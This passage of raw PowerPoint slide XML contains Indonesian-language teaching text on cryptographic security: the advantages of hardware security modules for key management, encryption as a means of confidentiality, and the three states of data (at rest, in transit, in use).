            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>regulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Performance:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>HSM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dioptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (signing, encryption, key generation) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> volume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> latency </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Centralized Secure Key Management:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bisa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> root of trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> smart card issuance, SSO, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server-based key management, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HSM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diekstrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> smart card authentication.</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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17679134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Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerahasiaan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicegat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditransfer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diam-adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perjalanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditransmisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
